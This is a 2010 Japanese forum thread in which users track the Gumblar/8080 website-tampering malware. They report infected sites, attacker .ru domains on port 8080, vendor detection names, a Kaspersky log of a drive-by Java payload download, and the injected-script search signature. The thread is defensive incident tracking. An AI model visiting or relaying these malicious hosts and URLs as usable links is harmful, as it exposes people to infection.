5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

【Gumblar/GENO】Web改竄ウイルス総合スレ3【8080】

411 :名無しさん@お腹いっぱい。:2010/01/22(金) 22:18:40
http://namidame.2ch.net/test/read.cgi/car/1257733373/2
/*Exception*/

412 :名無しさん@お腹いっぱい。:2010/01/22(金) 22:33:21
>>411
それ、まさかそのスレッドがやられているってこと?
正直に話してくれ

413 :名無しさん@お腹いっぱい。:2010/01/22(金) 22:34:23
>正直に話してくれ
ワロタ

414 :名無しさん@お腹いっぱい。:2010/01/22(金) 22:36:30
>>412
貼られてるリンク先だよ
安心しろよw

415 :名無しさん@お腹いっぱい。:2010/01/22(金) 22:37:20
>>412
再感染
http://pc11.2ch.net/test/read.cgi/sec/1261855221/985-999n
http://namidame.2ch.net/test/read.cgi/car/1257733373/172-174n

416 :名無しさん@お腹いっぱい。:2010/01/22(金) 22:40:44
>>411
検出NODだけ
http://www.virustotal.com/analisis/380466ea50ef6cd7ffdc7e35ad756ee9a4f8736474aa0e7552ad6889c1012382-1264167242

avastには検体提出済み
誰か他のもよろしく

417 :名無しさん@お腹いっぱい。:2010/01/22(金) 22:42:39
マグペケか

418 :名無しさん@お腹いっぱい。:2010/01/22(金) 22:47:04
一体NODに何があったというのだ
化け物か

419 :名無しさん@お腹いっぱい。:2010/01/22(金) 22:56:20
なんかのランキングだとNOD最強らしいじゃん、こないだまでゴミじゃなかった?

420 :名無しさん@お腹いっぱい。:2010/01/22(金) 22:57:47
>>419
あれってあてにならないんじゃなかった?

421 :名無しさん@お腹いっぱい。:2010/01/22(金) 23:00:08
SRIだろ?
あれはネタにもならない

422 :名無しさん@お腹いっぱい。:2010/01/22(金) 23:06:29
まさか中の人が派生種作ってるんじゃ

423 :名無しさん@お腹いっぱい。:2010/01/22(金) 23:08:01
>>411 cobalttrueblue.ru:8080

424 :名無しさん@お腹いっぱい。:2010/01/22(金) 23:08:46
コバルト8080

425 :名無しさん@お腹いっぱい。:2010/01/22(金) 23:13:51
>>350
見てきた

> 23 名前: モンドリ(東京都)[] 投稿日:2010/01/22(金) 16:36:14.22 ID:AdO+SHBS ?2BP(778)
> キャッシュ消せば大丈夫って
> ウイルスに詳しいGENOの店の人がいってただろ!

このレス見れただけで満足だわ 懐かしいなw色々と半年前のこと思い出したわww

426 :名無しさん@お腹いっぱい。:2010/01/22(金) 23:22:05
>>398
告知もせず無視決め込んだパルコールは勝ちだな

427 :名無しさん@お腹いっぱい。:2010/01/22(金) 23:27:05
白痴ランド,昨日直ってた後は告知してなかったな
このままにする気かな

428 :名無しさん@お腹いっぱい。:2010/01/23(土) 00:13:41
>>411,>>416
かすぺ
> Hello,
>
>
> index.html, scooooop.html - Trojan-Downloader.JS.Pegel.c
>
> New malicious software was found in these files. Detection will be included in the next update. Thank you for your help.
>
> Regards, Vorobiov Vitaly
> Virus Analyst

429 :名無しさん@お腹いっぱい。:2010/01/23(土) 00:16:52
熊親父

430 :名無しさん@お腹いっぱい。:2010/01/23(土) 00:19:29
やっべかすがに見えたwwwwww

なんでかすがが出てくるんだろう


431 :名無しさん@お腹いっぱい。:2010/01/23(土) 00:51:06
AVGの常駐ガードは優秀だな。

432 :名無しさん@お腹いっぱい。:2010/01/23(土) 01:05:21
>>431
どこがだよ

433 :名無しさん@お腹いっぱい。:2010/01/23(土) 01:26:58
過去に3回ほど何かしらに連絡したけど、改竄されてましたって告知したのは無かったな。

434 :名無しさん@お腹いっぱい。:2010/01/23(土) 02:27:21
http://green●ribbon●to/~fakestar/
/*Exception*/ さんは新型か
genuinehollywood.ruを追加

435 :名無しさん@お腹いっぱい。:2010/01/23(土) 02:31:33
401 えらぁ
tkfd-shumatsu-gakko●jp

436 :名無しさん@お腹いっぱい。:2010/01/23(土) 03:14:55
>>434
ribbon.toにめる

437 :名無しさん@お腹いっぱい。:2010/01/23(土) 03:20:41
ttp://f35.aaa.livedoor●jp/~gotozoo/
yourtruemate.ru


438 :名無しさん@お腹いっぱい。:2010/01/23(土) 03:32:07
view-source: で見ても大丈夫だよね?

439 :名無しさん@お腹いっぱい。:2010/01/23(土) 03:45:27
これって「*.com*.com*」で阻止できるんじゃね?



440 :名無しさん@お腹いっぱい。:2010/01/23(土) 03:46:51
>>438
chromeだとview-source:で危険なサイトでブロックされると、
表示許可したときにソースではなく普通に表示されたような気がする
ブロックされなければ平気


441 :名無しさん@お腹いっぱい。:2010/01/23(土) 03:53:14
GumblarCheckerの管理人さん。
もし見ていたら、「Gumblarウイルスからコンピュータを保護する」ページのFirefoxの項目は
修正することを提言しておきます。
3.6ではツール-オプション-コンテンツの「Javaを有効にする」は無くなっていますので。

FirefoxをJavaを無効にする方法はこちらを紹介した方がよいのではないでしょうか?

Java アプレットを無効にするには
ttp://support.mozilla.com/ja/kb/Java%20%E3%82%A2%E3%83%97%E3%83%AC%E3%83%83%E3%83%88%E3%82%92%E7%84%A1%E5%8A%B9%E3%81%AB%E3%81%99%E3%82%8B%E3%81%AB%E3%81%AF

442 :名無しさん@お腹いっぱい。:2010/01/23(土) 03:54:16
>>437
一応そこの管理人にめるしたけど、スパム扱いされるの必至なので
ドメインから逝こうとしてライブドアかと思ったらAAA!CAFEなのね。。。

443 :名無しさん@お腹いっぱい。:2010/01/23(土) 03:56:20
>>440
あんがと。
 >>437 を見てみたけど ESETでブロックされた。
怖いからもう止めますw

444 :名無しさん@お腹いっぱい。:2010/01/23(土) 04:05:22
>>437
Sophosきてました。
http://www.virustotal.com/analisis/e064a38951cdc837dcc80a7093cc4eb2f19fab6753268f74d7928ab1874baf22-1264184719
File index.htm received on 2010.01.22 18:25:19 (UTC)
Result: 3/40 (7.50%)
Kaspersky 7.0.0.125 2010.01.22 Trojan-Downloader.JS.Pegel.c
NOD32 4797 2010.01.22 JS/TrojanDownloader.Agent.NRO
Sophos 4.50.0 2010.01.22 Troj/JSRedir-AR

445 :名無しさん@お腹いっぱい。:2010/01/23(土) 04:12:47
>>411,>>416
Avira
> Filename Result
> index.html MALWARE
> The file 'index.html' has been determined to be 'MALWARE'.Our analysts named the threat JS/Agent.33127.The term "JS/" denotes a Java scriptvirus.Detection will be added to our virus definition file (VDF) with one of the next updates.
>
>
> Filename Result
> scooooop.html MALWARE
> The file 'scooooop.html' has been determined to be 'MALWARE'.Our analysts named the threat JS/Agent.505009.The term "JS/" denotes a Java scriptvirus.Detection will be added to our virus definition file (VDF) with one of the next updates.

446 :名無しさん@お腹いっぱい。:2010/01/23(土) 04:16:14
>>411,>>416
Fortinet
> Dear Customer,
>
> We have analyzed the sample you provided and developed the
> pattern to catch it. We will add detection for this sample
> in the next regular update.
>
> The sample you submitted will be detected as "JS/MalRedir.B!tr.dldr".
>
> Regards,
> --
> Alexandre Aumoine
> Anti-Virus Analyst, Threat Response Team - EMEA
>
> To submit a suspicious file to Fortinet:
> http://www.fortinet.com/FortiGuardCenter/virus_scanner.html

447 :名無しさん@お腹いっぱい。:2010/01/23(土) 04:21:27
"<script>/*Exception*/ document.write("+"<script src" の検索結果 約 60,600 件
ttp://www.google.co.jp/search?hl=ja&q=%22%3Cscript%3E%2F*Exception*%2F+document.write%28%22%2B%22%3Cscript+src%22&btnG=%E6%A4%9C%E7%B4%A2&lr=


448 :名無しさん@お腹いっぱい。:2010/01/23(土) 04:52:25
http://www●adkako7●com/ikesei/を開いたらカスペがトロイに反応しました。
カスペのログを見るとこのようになっています。
許可しました http://icq-com●bangbros1●com.adsrevenue-net●genuinecolors●ru:8080/pics/JavaGame●jar
OK http://icq-com●bangbros1●com.adsrevenue-net●genuinecolors●ru:8080/pics/JavaGame●jar/META-INF/MANIFEST●MF
OK http://icq-com●bangbros1●com.adsrevenue-net●genuinecolors●ru:8080/pics/JavaGame●jar/myf/y/PayloadX●class
OK http://icq-com●bangbros1●com.adsrevenue-net●genuinecolors●ru:8080/pics/JavaGame●jar/myf/y/AppletX●class
検出&禁止しました http://icq-com●bangbros1●com.adsrevenue-net●genuinecolors●ru:8080/pics/JavaGame●jar/myf/y/LoaderX●class
許可しました http://icq-com●bangbros1●com●adsrevenue-net●genuinecolors●ru:8080/pics/myf/y/AppletX●class

再現しようとしてもカスペのログに何も表示されません。
OKしたものや最後の許可で私が感染済なので無反応なのでしょうか?

449 :名無しさん@お腹いっぱい。:2010/01/23(土) 05:00:09
■Gumblar.cn(Gumblar、Gumblar.x)
現在冬眠中。のはずだが・・
ttp://www.google.com/safebrowsing/diagnostic?site=Gumblar.cn&hl=ja
センセイは毎日捕捉中w

■Gumblar.8080系(と呼ぶことになったらしい)
/*LGPL*/:ちょっと迷走した後/*Exception*/に進化
※世界各地で絶賛バージョンアップ中。
検索ワード:"<script>/*Exception*/ document.write("+"<script src"

/*CODE1*/:弾かれまくるので追跡を断念
※情報求ム

■何故かスルーされる亜種っぽいやつ
<script>function〜:8080系の亜種?
少しずつ減ってきたっぽい。

450 :名無しさん@お腹いっぱい。:2010/01/23(土) 05:21:17
>>448
一度アクセスしたIPははじかれるらしいので試すならIP変えないとだめだね
でもそういうデザインの感染サイトすごくいっぱいあるよね

451 :名無しさん@お腹いっぱい。:2010/01/23(土) 07:45:55 ?PLT(12031)
>>441
直しました
IETabが3.6に対応したらまた書き直す

452 :名無しさん@お腹いっぱい。:2010/01/23(土) 10:18:17
関西の自主上映団体
ttp://www.rcsmovie.co●jp/

453 :名無しさん@お腹いっぱい。:2010/01/23(土) 10:31:19
>>452
ワーオ、そこ京都(大阪でも?)ではそこそこ有名よ〜
単館上映映画見る人がかなりチェックしてると思う。

454 :名無しさん@お腹いっぱい。:2010/01/23(土) 11:06:41
串通せば感染する。

ただ、Gumblarに感染後、forhomessale.ru に感染した旨を通知する通信が発生するらしいんだが
Gumblar感染後、forhomessale.ru の名前解決に失敗してるっぽい、、、

それでもFTPアカウントは窃取されんのかな?

455 :名無しさん@お腹いっぱい。:2010/01/23(土) 11:09:57
>>452
Last-Modified: Fri, 22 Jan 2010 11:53:46 GMT

456 :名無しさん@お腹いっぱい。:2010/01/23(土) 11:53:40
>>442
似たようなサイト作ってるんで,そのメールアドレスから送信しておいたよ。
キャッシュにはAvast5反応してくれるんだけど,トップページのにはまだ
反応してくれない。次の更新で対応してくれてればいいけど。

457 :名無しさん@お腹いっぱい。:2010/01/23(土) 11:54:51
>>449
> ■Gumblar.cn(Gumblar、Gumblar.x)

Gumblar.xはGumblar(GENO)とは別にして欲しい

458 :名無しさん@お腹いっぱい。:2010/01/23(土) 12:13:26
>>452
ttp://www.google.co.jp/search?hl=ja&q=http%3A%2F%2Fwww.rcsmovie.co.jp%2F+%E9%9B%BB%E8%A9%B1%E7%95%AA%E5%8F%B7&btnG=%E6%A4%9C%E7%B4%A2&lr=
凸完了
感染は以前もあり、対応済みとのことww

459 :名無しさん@お腹いっぱい。:2010/01/23(土) 12:16:43
対応ってのは「改竄部分を消して元に戻す」って意味だろうな
鍵を代えるだの穴を塞ぐだのではなく

460 :名無しさん@お腹いっぱい。:2010/01/23(土) 12:31:42
>>458
乙です。
どんな対策か気になりますね

461 :名無しさん@お腹いっぱい。:2010/01/23(土) 13:28:40
>>460
期待は出来ないと考えた方がいいかもです

HPを作っている方は専門会社ではなく
ボランティアスタッフが作っているとか

映画チケットを貰ってるそうなので
無料奉仕ではなさそうですが

462 :名無しさん@お腹いっぱい。:2010/01/23(土) 14:12:08
>>448 でじろく
>>452 whois上流のとこ (´-`).。oO(届いてくれればいいなぁ…)
それぞれめる

>>461
お疲れ様です。
まだ直ってなかったので上流にめるしました。

463 :名無しさん@お腹いっぱい。:2010/01/23(土) 14:31:08
見逃してたm(_ _)m
>>456
乙です。
助かります。

464 :名無しさん@お腹いっぱい。:2010/01/23(土) 15:19:57
www●minami-aoyama●info/
genuinehollywood●ru:8080


札幌市公園緑化協会直ったんじゃなかったっけ?
リンク元はなさそうだから残骸っぽいけど、日付が
www●sapporo-park●or●jp/blog_odori/wp-includes/js/tinymce/utils/mctabs●js
Last-Modified: Fri, 22 Jan 2010 01:49:02 GMT

www●sapporo-park●or●jp/blog_nishioka/wp-includes/js/scriptaculous/dragdrop●js
Last-Modified: Fri, 22 Jan 2010 01:20:42 GMT
genuinehollywood●ru:8080


ちなみに、index●php はどうやってデコードしてるんですか?




465 :名無しさん@お腹いっぱい。:2010/01/23(土) 15:20:54
Vista/7でIEの保護モード使ってる奴すくなすぎだろ
保護モード使えばブラウザやプラグインのバグで無警告でやられるのなんて無いだろ
警告メッセージがでてOKだせばやられるとかだし

466 :名無しさん@お腹いっぱい。:2010/01/23(土) 15:30:03
>>465
埋め込み動画が再生出来ない・・・
ttp://www.katch.ne.jp/~kakonacl/burauza/burauza.html

467 :名無しさん@お腹いっぱい。:2010/01/23(土) 15:49:20
>>465
みんな使ってると思うが
統計でも取ったのか?

468 :名無しさん@お腹いっぱい。:2010/01/23(土) 17:00:25
>>465
今回は関係ないけど、常に穴があると思って用心したほうが良いよ。

ttp://slashdot.jp/security/article.pl?sid=10/01/21/0350220
NT以降の全ての32ビットWindowsバージョンでユーザー権限昇格を許すバグが見つかる

ttp://japan.zdnet.com/news/sec/story/0,2000056194,20407192,00.htm
マイクロソフト、32ビットWindowsカーネルの脆弱性について警告

469 :名無しさん@お腹いっぱい。:2010/01/23(土) 18:34:31
また火狐野朗がなんかいっちゃってるのか
LINDOWS?つかえって

470 :名無しさん@お腹いっぱい。:2010/01/23(土) 18:46:32
lindowsってザンドロスに吸収されたんだっけ

471 :名無しさん@お腹いっぱい。:2010/01/23(土) 18:53:00
Windows以外を使うってのも、ありと言えばありだろう。

472 :名無しさん@お腹いっぱい。:2010/01/23(土) 19:03:21
今頃になってこのスレ読んで、なんか甘く見ていた感
FxとIE8併用だけどIEはしばらく開かんとこう・・
AVも気休め程度のAVGじゃ不安だ。不安すぐる。

473 :名無しさん@お腹いっぱい。:2010/01/23(土) 19:11:44
なんか面倒だからブラウザから8080への通信をブロックすることにした。
ポート変われば意味ないだろうけど。

474 :名無しさん@お腹いっぱい。:2010/01/23(土) 20:17:21
対策してればFxもIEも同じだよ


475 :名無しさん@お腹いっぱい。:2010/01/23(土) 23:37:29
Gumblar[ガンブラー](複数の亜種を含む)ウイルスの感染拡大と対策のお願い
http://www.sakura.ad.jp/news/archives/20100119-004.news

ガンブラー再燃を契機にセキュリティの基本を見直そう
http://itpro.nikkeibp.co.jp/article/Interview/20100120/343557/?ST=security

埋め込みコード変えドメインも一新、拡散続ける正規サイト改ざん
http://www.so-net.ne.jp/security/news/view.cgi?type=2&no=2130

ガンブラーと呼ばれている一連のサイト改ざん(Gumblar.x、8080)は、
ウイルスに感染したサイト管理者のパソコンから
サイト更新用のFTPアカウントを盗み出し、それを使って行っている。
SQLインジェクションのようにWebサイトの穴を探して入り込んでくるのではなく、
正面玄関から堂々と入って来てしまうのだ。

476 :名無しさん@お腹いっぱい。:2010/01/23(土) 23:44:34
電子立国の総本山、JEITAがガンブラー被害
http://www.yomiuri.co.jp/net/security/goshinjyutsu/20100121-OYT8T00741.htm?from=nwlb

477 :名無しさん@お腹いっぱい。:2010/01/23(土) 23:55:25
>>475
【トレンドマイクロ】
 \(^o^)/オワタ


478 :名無しさん@お腹いっぱい。:2010/01/23(土) 23:57:58
ガハハ

479 :名無しさん@お腹いっぱい。:2010/01/23(土) 23:58:09
またアンチウイルス戦争始めるのか

480 :名無しさん@お腹いっぱい。:2010/01/24(日) 00:21:20
ちょいオモロイ奴があったんだけど

http://ameblo.jp/suzu-gyosei/entry-10439409700.html
> 2010-01-21 15:50:20
> 当事務所のホームページ「カーポスト」が
> 年明けのいつごろかにgumplerにより改ざんされておりました。
> サーバー会社と連携して、現在感染しているファイルが
> ないことを確認致しました。

これって、/*GNU GPL*/が入ってるここのことだよな
http://www●car-post●jp/
Last-Modified: Tue, 19 Jan 2010 03:52:37 GMT

とりあえずgoogleさんに聞いてみよう
ttp://74●125●153●132/search?q=cache:lbVrFVlo7lYJ:www.car-post.jp/&cd=1&hl=ja&ct=clnk&gl=jp
このページは 2010年1月13日 16:13:55 GMT に取得されたものです

/*LGPL*/が入ってたんだな……えっ

某日 /*LGPL*/ ハケーン
19日 (/*GNU GPL*/入り)バックアップから復旧しますた
21日 サーバー会社と連携して、現在感染しているファイルがないことを確認致しました(キリッ!)

って話なのか
詳しい奴教えてくれ


481 :名無しさん@お腹いっぱい。:2010/01/24(日) 00:25:10
俺いまノーガードなんだけど、火狐の「RequestPolicy」ってアドオンだけで問題ないなw
>>448のサイトも、ちゃんとアクセスをブロックしてるログでてる。

この手の、他サイトへアクセスしてウイルスに感染させるタイプにすごく有効じゃね?

482 :448:2010/01/24(日) 00:27:55
>>5>>8(11)の感染確認をして記述やファイルがなく、カスペのフルスキャンで何も出てこなければ感染はしていないと思っていいのでしょうか?
WinXPSP3でKaspersky Internet Security 2010を使っています。

483 :名無しさん@お腹いっぱい。:2010/01/24(日) 00:32:33
>>482
亜種が生まれ続けているので感染していないと言い切れない

484 :名無しさん@お腹いっぱい。:2010/01/24(日) 00:34:16
>>480
http://www●car-post●jp/
いまみてきた
/*GNU GPL*/いたお

485 :名無しさん@お腹いっぱい。:2010/01/24(日) 00:35:48
>>480
サーバー会社もろとも終わってるな
halfsite.ruか

486 :名無しさん@お腹いっぱい。:2010/01/24(日) 00:37:14 ?PLT(12031)
Microsoft Baseline Security Analyzer 2.1を使ったセキュリティスキャン
ttp://gumblarchecker.crz.jp/defend.html#mbsa
追加

487 :名無しさん@お腹いっぱい。:2010/01/24(日) 00:39:33
>>482
心配な場合はOS入れなおしが精神的にも安心安全

488 :名無しさん@お腹いっぱい。:2010/01/24(日) 00:40:17
>>480
RequestPolicyで確認したお!怪しいのブロックしてるお!ww

489 :名無しさん@お腹いっぱい。:2010/01/24(日) 00:41:14
次はRequestPolicyか
火狐野朗が

490 :名無しさん@お腹いっぱい。:2010/01/24(日) 00:48:13
>>486


491 :448:2010/01/24(日) 01:34:42
>>483,>>487
少し不安は残りますが>>6の更新とアンチウイルスソフトのアップデートをまめにしつつしばらくこのままで行こうと思います。

492 :名無しさん@お腹いっぱい。:2010/01/24(日) 01:37:37
>>464
上:さくら
下:そこだけじゃないことを確認/*Exception*/ blogがいくつか… 作業中

> index●php はどうやってデコードしてるんですか?
上のほうにあるスクリプトのこと?
メモ帳でガリガリ

493 :名無しさん@お腹いっぱい。:2010/01/24(日) 01:51:06
>>492勘違い>>464の下だけっぽい。。。orz......
作業にもどります。

494 :名無しさん@お腹いっぱい。:2010/01/24(日) 01:57:54
あー、/wp-includes/js/かお。。。

495 :名無しさん@お腹いっぱい。:2010/01/24(日) 01:57:59
>>444
粕は、まとめて検出の後任が
どうもTrojan-Downloader.JS.Gumblar.x (Gumblar) から
現段階Trojan-Downloader.JS.Pegel.c (.Pegel) になった模様。

ttp://www.kaspersky.com/viruswatchlite?search_virus=Gumblar
ttp://www.kaspersky.com/viruswatchlite?search_virus=Pegel

ペ? ペゲ? ペジ?

496 :名無しさん@お腹いっぱい。:2010/01/24(日) 02:01:11
ここは2ちゃんらしくプゲラウィルスと呼ぶべきかと。

497 :名無しさん@お腹いっぱい。:2010/01/24(日) 03:11:28
>>464
下:とりあえずwhoisからめる

498 :名無しさん@お腹いっぱい。:2010/01/24(日) 03:42:06
パトラッシュ、僕はもう疲れたよ・・・
ベンダーに任せるよ・・・

499 :名無しさん@お腹いっぱい。:2010/01/24(日) 03:42:52
>>480
これはもうどこに通報すればいいんだろ。。。

500 :名無しさん@お腹いっぱい。:2010/01/24(日) 03:51:12
>>480とりあえずwhoisからめる

大丈夫にゃんだろか。

ねるねるねるね

501 :名無しさん@お腹いっぱい。:2010/01/24(日) 04:10:54

  \           ■■          / 
   \         ■■■      \∧∧∧∧∧∧∧∧∧∧∧∧∧∧/ 
     \       ■■■■      < ━    ╋       ┓   ┃> 
      \     ■■■■    /< ━┓   ╋   ┃   ┃  ┃> 
        \   ■■☆■■  /  <  ┃ ┏╋━  ┃   ┃   > 
         \  ■■■■■/   <  ┃ ┗┛    ┗      ・> 
          彡|  ━  ━ |ミ   /∨∨∨∨∨∨∨∨∨∨∨∨∨\  
         彡彡|─◎─◎─|ミミ   
  ─────彡彡| ┌└ ┐ |ミミ─────────────── 
         彡彡| ───  |ミミミ 
        彡彡彡\\二/ /ミミミ   テーレッテレー♪
        彡彡彡▲\__/▲ミミミ   
       /彡彡▲■■■■■▲ミミ\     ねっておいしい
     / 彡彡 ■■■■■■■ミミ  \     ねるねるね〜るね♪

502 :名無しさん@お腹いっぱい。:2010/01/24(日) 07:17:50
> ガンブラー再燃を契機にセキュリティの基本を見直そう
> http://itpro.nikkeibp.co.jp/article/Interview/20100120/343557/?ST=security

俺たちの誤解なんだってさ

> ■変更履歴
> 記事公開当初、ガンブラー攻撃によるWeb改ざんはSQLインジェクション
> によるものだという誤解を招く表現があったため、これを修正しました。
> [2010/1/22 15:40]


記念にDiffておくよ

*****【旧】
 ガンブラー攻撃によるWeb改ざん手口は、Webアプリケーションのぜい弱性を攻撃する「SQLインジェクション」が主流です。今回のWeb改ざんも、おそらくSQLインジェクションによるものだと推測しています。
*****【改】
 一般的に、Web改ざんの手口はWebアプリケーションのぜい弱性を攻撃する「SQLインジェクション」が主流です。今回のガンブラー攻撃によるWeb改ざんにも、SQLインジェクションが使われた可能性があると推測しています
*****

*****【旧】
 まずは、最新のセキュリティ製品を使って、Webアプリケーションのぜい弱性を検出/修正してください。前述のように、ガンブラーによるWeb改ざん手口の主流はSQLインジェクションです。
*****【改】
 まずは、最新のセキュリティ製品を使って、Webアプリケーションのぜい弱性を検出/修正してください。前述のように、ガンブラーによるWeb改ざん手口にはSQLインジェクションが使われている可能性があるためです。
*****

*****【旧】
*****【改】
■変更履歴
記事公開当初、ガンブラー攻撃によるWeb改ざんはSQLインジェクションによるものだという誤解を招く表現があったため、これを修正しました。
[2010/1/22 15:40]
*****

503 :名無しさん@お腹いっぱい。:2010/01/24(日) 07:24:22
修正されてもまだ誤解されそうだな。
どう見てもSQLインジェクションと関連付けたがってるようにしか見えない。

504 :名無しさん@お腹いっぱい。:2010/01/24(日) 07:28:40
念のため貼っとく

> 大辞林 第二版 (三省堂)
>
> ごかい 【誤解】
>
> (名)スル
>
> 事実や言葉などを誤って理解すること。思い違い。
> 「真意を―する」「―を招く」


505 :名無しさん@お腹いっぱい。:2010/01/24(日) 07:41:11
>>475
トレンドマイクロ醜態をさらしたなw
だいたい固定コンテンツしかないようなサイトまで被害にあってる時点でSQLインジェクション説は微妙なのにね

506 :名無しさん@お腹いっぱい。:2010/01/24(日) 07:43:21
>>502
セキュリティー企業なのにトレンドマイクロアホすぎるだろ
素人がやってんのか?

507 :名無しさん@お腹いっぱい。:2010/01/24(日) 08:17:50
>>505
htmlのような静的なコンテンツしか置けないGeocitysでも起こってるから100%あり得ない

508 :名無しさん@お腹いっぱい。:2010/01/24(日) 08:44:15
   ,,v‐v-/l_  (⌒)
  _「/ ̄  く   /
  lYノノ/_ノl_ヽ))
  <イ( l l )l>  / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
 <|)'|l、"(フノ|l  < えっちのような性的なコンテンツはいけないと思います!
  ,(ヨリ<>o<>リ']  \______________
  |ト‐!]-ム- i']l
  ヽ_ノv__l/ /
.  ノ[//‐─‐/_/、
 ( /E|,   (フlヨ \
 ,-| El___lヨ /
└-\`^^^^^^´/

509 :名無しさん@お腹いっぱい。:2010/01/24(日) 08:55:32
トレンドマイクロのWebサイト改ざん、Webアプリにぜい弱性の可能性
http://itpro.nikkeibp.co.jp/article/NEWS/20080312/296062/

ここから時計が止まってるんだ
きっとそうに違いない

510 :名無しさん@お腹いっぱい。:2010/01/24(日) 08:56:57
例の上映団体RCS

>一部のセキュリティソフトにおいて、
>当ホームページへのアクセス遮断や、
>感染警告の表示などが発生している様です。
>早急な対応を試みておりますが、
>じゅうぶんご注意ください。

改竄されてました,とは意地でも書かないのね

511 :名無しさん@お腹いっぱい。:2010/01/24(日) 09:21:45
ちょっとここでずらずらっとタイムラインを自分的に整理だらだらと羅列してみました。

恥ずかしいので Hide ::

まず、最初に事態が発生したのは 2009年3月ごろ
lite〜.cnとかいう変なドメインから
"drive by download"なる攻撃手法が発生しました。

当初、原因ははっきりせず、
やがて Adobe Flash/Readerの「最新版では塞がれている脆弱性」を
つかった自動マルウェア埋め込みの手法であることが判明しました。

これは、当時としては「なにタワゴト言ってるんだ」というレベルの
「Webを見ただけで感染」という手法であり、あまりそれを信用してもらえず、
セキュリティ各社もあまり報道せず、事態は水面下で流れていきます。

そして、運命の 2009.04.05 PC通販ショップのGENOで感染が確認され、
一度は感染コードの除去が行われたにもかかわらず、
再感染というセンセーショナルな事態を引き起こします。

GENOが感染した際には gumblar.cnではなく、
zlkon.lv(94.247.2.195 as hs.2-195.zlkon.lv)でした。
このときには単純な難読化コードに jQuery.js への誘導コードが記述され、
さらにそこからドライブ・バイ・ダウンロード攻撃のためのリンクに飛ばされました。

GENOが事あるごとに叩かれるのは、
「コンピュータを売ってる店がそんな認識でいいのか?」という部分と
「キャッシュを消せば大丈夫」ってあたり(笑)だとおもいますけど、

同時期に感染した楽天系の2つの店はもっと対応が酷かったことは
あまりしられておらず、
私的には 「GENOウィルス」という呼称は好きではアリマセン。

512 :名無しさん@お腹いっぱい。:2010/01/24(日) 09:23:48
>>511
ここで重要なことは従来言われていた
「怪しいサイトにいかなければ大丈夫」という神話が
崩壊したことです。

普通一般のどこにでもあるサイトが
ある日突然、陥落して毒を吐き出すようになる
というのは想像すらしていなかった
攻撃ベクトルになりました。

その後、94.247.2.195は応答停止となり、
終焉したかにおもわれましたが、
わずかのブランクの後、
初代Gumblar(Gumblar/Martuz)として凱旋してきました。
このとき、初めて事態の深刻さがわかりました。

初期の zlkon の攻撃時に「インストール」されていたマルウェアは
潜伏中に感染ノードからありとあらゆる情報を盗み、
一番有効な撹拌手段として、
FTPアカウントを盗んでサイトを改ざんし、
さらに感染者を増やすというねずみ講的手法に転じたのです。

しかも、このねずみ講には、大きな違いがありました。

zlkon.lv時代になかった
「感染しない環境には普通のコードを返す」という
逆発想的rootkit手法を導入したのです。

更にはIP制限により、一度マルウェアをダウンロードした相手には
一定期間配布しないという「ケチ政策」も施行されました。

513 :名無しさん@お腹いっぱい。:2010/01/24(日) 09:26:13
>>512
これにより、感染する可能性の低い環境には何も起きず、
脆弱性のある環境への「無差別ターゲット型」攻撃という
言語的にもにアリエナイ攻撃手法が確立しました。

この手法により脆弱性を放置していた環境にのみ爆発的に広まり、
かつ、普通にセキュリティ意識の高いユーザは何が起きているのかわからず、
セキュリティ会社は検体を取得できないという、
きわめて皮肉な結果が更なるパンデミックを引き起こしたのです。

しかも、この勤勉なマルウェア作者はほとんど毎日のように、
javascriptコード、マルウェア本体の更新を行い、
セキュ会社とのイタチゴッコなせめぎ合いの主導権を握り続けました。

このとき、悔やまれることは zlkon.lvのテイクダウンの際に、
(ITパスポートのCMをうつ金があるなら)
きちんとした対応策を
IPAあたりが音頭を取って報道等で告知していれば、
こんな事態になることはなかったのではないか?と思われることです。

しかし、まだこのときは救いがありました。

gumblar.cnもmartuz.cnも、単独のIPであり、
極端なことを言えばたった3つのIPを塞いでしまえば、
この攻撃は無効化されたのです。

そして、このことをいまだに引きずって
「危険なIP/TLDを塞げば大丈夫」という
幻想を生む皮肉な結果になりました。

514 :名無しさん@お腹いっぱい。:2010/01/24(日) 09:29:04
>>513
一方、攻撃手法として確立してしまった
ドライブ・バイ・ダウンロードは、
ますます嫌な進化を続け、
8080ポートへのリバースプロキシを悪用した攻撃が
水面下で進行していました。

この攻撃は、細かいスパンで切り替わる
5基のラウンドロビンを使った大量のドメイン投入で、
名称がつけられないまま 8080(仮)として、
延々とラウンドロビンを差し替えながら
感染ノードを増やしていました。

やがて、この 8080系も姿を消したかに見えた矢先の
2009年11月、
ScanSafeとKasperskyが突然アラートを発し、
「Gumblar復活」の烽火を上げたのです。

この新しいGumblar(Gumblar.X)は、
以前の gumblarよりも更に洗練された攻撃で、
その恐ろしく緻密に計算された陥落サイト群のヒエラルキー構成により、
幾つものBOTが、複数の役目を絡み合いながら機能する、
超並列Botサーバとなっていました。

しかし、この攻撃に使用されていた脆弱性は、
既に塞がれていたものばかりで、
これまで散々脅されていたユーザは
きちんと Adobe系の穴を塞いでいたため、
それほど深刻な事態にはなりませんでした。

515 :名無しさん@お腹いっぱい。:2010/01/24(日) 09:31:44
>>514
ところが、その背後で 8080系が古くい癖に極めて有効な
Java JREの脆弱性を取り入れ、
一気に感染ノードを広げにかかりました。

これは、日本において
メーカ販売のPCに「プリインストール」されており、
かつ自動更新の手続きがとられていないものが多いため、
一気に日本で拡散する原因となりました。

また、マルウェア誘導コードに有名な日本のドメインが
サブドメイン名やフォルダ名に羅列され、
ホワイトリストと単純なORチェックを行っている
IDSではスルーされてしまうという
悲惨な状況も確認されています。

しかも悪いことに
12月初旬に Adobe Readerの脆弱性が公表、
PoCが公開されたにもかかわらず

あー長かった。
というわけで、
もしウチ的に "Gumblar"って何?と応えるとするなら
「いやなもの」
ということでどうでしょう(殴)

UnderForge of Lack ≫ Blog Archive ≫ 2010.01.23 土曜日
http://www3.atword.jp/gnome/2010/01/23/jan-23-2010-sat/

516 :名無しさん@お腹いっぱい。:2010/01/24(日) 09:32:35
無理に小難しくひけらかし系文章書かなくてもいいから

517 :名無しさん@お腹いっぱい。:2010/01/24(日) 09:43:33
ふかいい話だな

518 :名無しさん@お腹いっぱい。:2010/01/24(日) 09:54:08
他人に何かを伝えるつもりが微塵もない、
単なるこれ見よがしな知識披露目的のオナニー記事だな。

